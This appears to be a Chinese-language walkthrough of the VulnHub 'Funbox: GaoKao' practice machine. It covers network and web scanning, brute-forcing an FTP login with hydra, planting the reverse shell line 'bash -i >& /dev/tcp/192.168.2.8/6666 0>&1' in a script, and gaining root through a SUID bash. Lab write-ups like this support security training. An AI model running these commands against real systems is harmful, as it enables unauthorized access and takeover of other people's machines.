一.环境搭建
1.靶场描述
It's a box for beginners, but not easy. Gather careful !!!
Hint:
Don't waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per account.
Enjoy the game and WYSIWYG !
This works better with VirtualBox rather than VMware
2.靶场下载
Funbox: GaoKao ~ VulnHub
3.靶场启动
二.信息收集
1.寻找靶场真实IP地址
nmap -sP 192.168.2.0/24
arp-scan -l
通过上面两个命令我们知道靶场真实IP地址为192.168.2.9
2.探测端口及服务
nmap -p- -sV 192.168.2.9
开启了21端口,服务为ftp
开启了22端口,服务为ssh
开启了80端口,服务为apache2
开启了3306端口,服务为mysql
三.渗透测试
1.访问web服务
http://192.168.2.9
2.扫描web服务
1)nikto扫描
nikto -h http://192.168.2.9
2)dirsearch扫描
dirsearch -u http://192.168.2.9 -e * -x 403 --random-agent
3)dirb扫描
dirb http://192.168.2.9
4)gobuster扫描
gobuster dir -u http://192.168.2.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php.txt.html,zip
都没有扫描到任何有用的信息,我们知道开启了21端口,我们查看ftp服务
3.渗透测试
1)ftp服务
ftp 192.168.2.9
我们可以看到一个文件,我们进行查看
sky@%L,我们可以看到用户名是sky,密码我们进行爆破
hydra -l sky -P /usr/share/wordlists/rockyou.txt ftp 192.168.2.9
我们看到密码是thebest,我们进行登录
ftp 192.168.2.9
我们可以看到登录成功,根目录有一个文件,我们进行查看
2)反弹shell
我们查看user.flag文件,可以看到是一个脚本,我们修改它,让它反弹shell
bash -i >& /dev/tcp/192.168.2.8/6666 0>&1
我们可以看到反弹成功,我们进行提权
3)提权
find / -perm -u=s -type f 2>/dev/null # 查看提权方式
我们可以看到bash提权,我们进行查看
我们可以看到提权方式是bash -p
到这里,渗透测试结束
这里我们只要掌握ftp爆破和hydra爆破即可